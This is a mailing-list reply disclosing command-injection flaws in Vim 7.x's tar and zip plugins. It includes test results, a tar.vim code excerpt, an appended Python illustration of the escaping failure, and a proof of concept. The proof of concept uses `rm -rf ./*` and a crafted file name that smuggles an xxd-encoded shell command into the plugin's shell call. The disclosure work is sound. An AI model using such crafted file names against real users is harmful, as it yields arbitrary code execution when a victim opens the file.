Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram@xxxxxxxxxxxxx> wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>> Product : Vim -- Vi IMproved
>> Version : Tested with 7.1.314 and 6.4
>> Impact : Arbitrary code execution
>> Wherefrom: Local and remote
>> Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.
> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems. The problems in the plugins have also
> been fixed, this requires updating the runtime files. Information about
> that can be found at http://www.vim.org/runtime.php
I do apologize: as written in the advisory, the version I worked with
was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
updated the advisory at http://www.rdancer.org/vulnerablevim.html .
Thanks to Bram for all the good work.
7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:
-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
strong : EXPLOIT FAILED
weak : EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
xpm : EXPLOIT FAILED
xpm2 : EXPLOIT FAILED
remote : EXPLOIT FAILED
gzip_vim : EXPLOIT FAILED
netrw : EXPLOIT FAILED
The original tarplugin exploit now produces a string of telling error messages:
/bin/bash: so%: command not found
tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
/bin/bash: retu: command not found
/bin/bash: bar.tar|retu|'bar.tar: command not found
It's easy to see that it is still possible to execute arbitrary shell commands.
$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
136 if tarfile =~# '\.\(gz\|tgz\)$'
137 " call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
*138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
139 elseif tarfile =~# '\.lrp'
140 " call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
*141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
142 elseif tarfile =~# '\.bz2$'
143 " call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
*144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
145 else
146 " call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
**147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
[...]
444 fun s:Escape(name)
445 " shellescape() was added by patch 7.0.111
446 if exists("*shellescape")
447 let qnameq= shellescape(a:name)
448 else
449 let qnameq= g:tar_shq . a:name . g:tar_shq
450 endif
451 return qnameq
452 endfun
(*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
(**) tar(1) allows arbitrary command execution via options ``--to-command'',
and ``--use-compress-program''.
The updated tarplugin attack is rather simple:
$ rm -rf ./*
$ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
$ vim +:q ./foo*
$ ls -l pwned
-rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
Cheers,
Jan Minar.
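An added illustration, not part of Jan's mail nor of tar.vim: a small Python model of the two layers at work, the single-quote escaping done by s:Escape() and the `%` expansion that Vim's `:!` performs afterwards. It shows why a name that is safely quoted still gets re-injected unquoted once `%` expands to the current file name, and that backslash-escaping the special characters (what the optional second argument of Vim's shellescape() does in versions that have it) removes the problem. The sample file name (with a harmless echo), the /bin/sh tokenizer and the restriction to `%`, `#` and `!` are simplifying assumptions of this model.

```python
import re
import shlex

# Constructed sample archive name in the spirit of the mail's PoC: a '%',
# a command, and an unbalanced single quote.  The payload is a harmless echo.
NAME = "foo%;echo injected;'bar.tar"

def vim_shellescape(name, special=False):
    """Model of Vim's shellescape(): wrap in single quotes, turn ' into '\\''.
    With special=True also backslash the characters that :! expands
    ('%' and friends; this model handles %, # and !)."""
    out = "'" + name.replace("'", "'\\''") + "'"
    if special:
        out = re.sub(r"([%#!])", r"\\\1", out)
    return out

def vim_bang_expand(cmdline, curfile):
    """Model of what :! does before calling the shell: an unescaped '%' is
    replaced by the current file name, with no quoting added, and a
    backslash that protected a special character is removed."""
    def repl(m):
        tok = m.group(0)
        return curfile if tok == "%" else tok[1]
    return re.sub(r"\\[%#!]|%", repl, cmdline)

def command_seen_by_shell(tarfile, special):
    """Same shape as tar.vim line 147 ('silent r! tar -tf <escaped name>');
    the tar file is the current buffer, so '%' expands to its own name."""
    cmd = "tar -tf " + vim_shellescape(tarfile, special)
    return vim_bang_expand(cmd, curfile=tarfile)

def shell_tokens(cmdline):
    """Tokenise roughly as /bin/sh would: quotes honoured, ; | & split out."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)

def command_count(cmdline):
    """Number of simple commands the shell would run for this line."""
    seps = {";", "|", "&", "&&", "||"}
    return 1 + sum(1 for t in shell_tokens(cmdline) if t in seps)

if __name__ == "__main__":
    for special in (False, True):
        cmd = command_seen_by_shell(NAME, special)
        print("special=%s -> %s" % (special, cmd))
        print("  shell runs %d command(s): %s"
              % (command_count(cmd), shell_tokens(cmd)))
```

With special=False the shell sees three commands (the quoted name is broken open by the unquoted copy that `%` inserted); with special=True it sees a single tar invocation whose only argument is the original name.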